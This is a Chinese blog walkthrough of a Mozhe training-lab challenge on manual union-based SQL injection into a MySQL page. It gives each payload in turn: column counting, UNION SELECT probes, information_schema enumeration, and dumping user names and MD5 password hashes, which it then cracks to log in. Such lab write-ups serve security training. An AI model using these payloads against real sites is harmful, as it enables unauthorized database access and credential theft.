MOZHE SQL手工注入漏洞测试(MySQL数据库)

主界面URL没有参数,无法判断是否有注入点

点击公告

【浏览器不便于查看返回包可以用burp】

测试URL

sql 复制代码
参数后加上单引号,报错,说明存在注入点
http://124.70.64.48:40021/new_list.php?id=1'

获取表列数

sql 复制代码
order by 4  返回200
order by 5  返回500
id 所在表有4列

爆显位

sql 复制代码
让id=-1,使前半段查询出错,让后半段查询结果显示出来
填充数字个数等于列刚才得到的列数
http://124.70.64.48:40021/new_list.php?id=-1%20union%20select%201,2,3,4

获取信息

XML 复制代码
在显位上查询以下信息:
version()                数据库版本5.7.22-0ubuntu0.16.04.1
user()                   用户root@localhost
@@version_compile_os     操作系统Linux
database()               数据库名字mozhe_Discuz_StormGroup

知道数据库名字,到information_schema里查数据库中的表

sql 复制代码
group_concat() 将结果连接起来,避免显示不完整
information_schema.tables记录了所有表的信息
information_schema.tables的table_schema列记录了表对应的数据库
information_schema.tables的table_name列记录了表名

union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

该数据库有两个表StormGroup_member,notice

知道表名查列名

sql 复制代码
group_concat() 将结果连接起来,避免显示不完整
information_schema.columns记录了所有列的信息
information_schema.columns的table_name列记录了列对应的表
information_schema.columns的column_name列记录了列名

union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

该数据库有列:id,name,password,status

知道列名查字段

sql 复制代码
union select 1,group_concat(name),group_concat(password),4 from mozhe_Discuz_StormGroup.StormGroup_member

name:mozhe,mozhe
password:356f589a7df439f6f744ff19bb8092c0,ae0af42ea5d582a11a9c994a96a2002e

密码为MD5加密,md5在线解密

第二个密码209883正确。(查看status列就知道,第一个账号status为0,登录不了)

成功登录,获取key

相关推荐
越来越无动于衷1 小时前
基于 JWT 的登录验证功能实现详解
java·数据库·spring boot·mysql·mybatis
看天走路吃雪糕1 小时前
墨者:SQL手工注入漏洞测试(MySQL数据库-字符型)
数据库·mysql·sql注入·sqlmap·墨者学院·字符型注入
辉盈防爆散热风扇2 小时前
EC 技术赋能:福佑防爆风扇如何平衡安全与节能?
安全
m0_747266095 小时前
代码审计与web安全选择题1
网络安全
柊二三5 小时前
XML的简略知识点
xml·数据库·oracle
君鼎6 小时前
安全逆向工程学习路线
安全·逆向·网安
每天敲200行代码7 小时前
MySQL 事务管理
数据库·mysql·事务
清 晨8 小时前
剖析 Web3 与传统网络模型的安全框架
网络·安全·web3·facebook·tiktok·instagram·clonbrowser
巴里巴气8 小时前
MongoDB索引及其原理
数据库·mongodb
程序员勋勋18 小时前
Redis的String数据类型底层实现
数据库·redis·缓存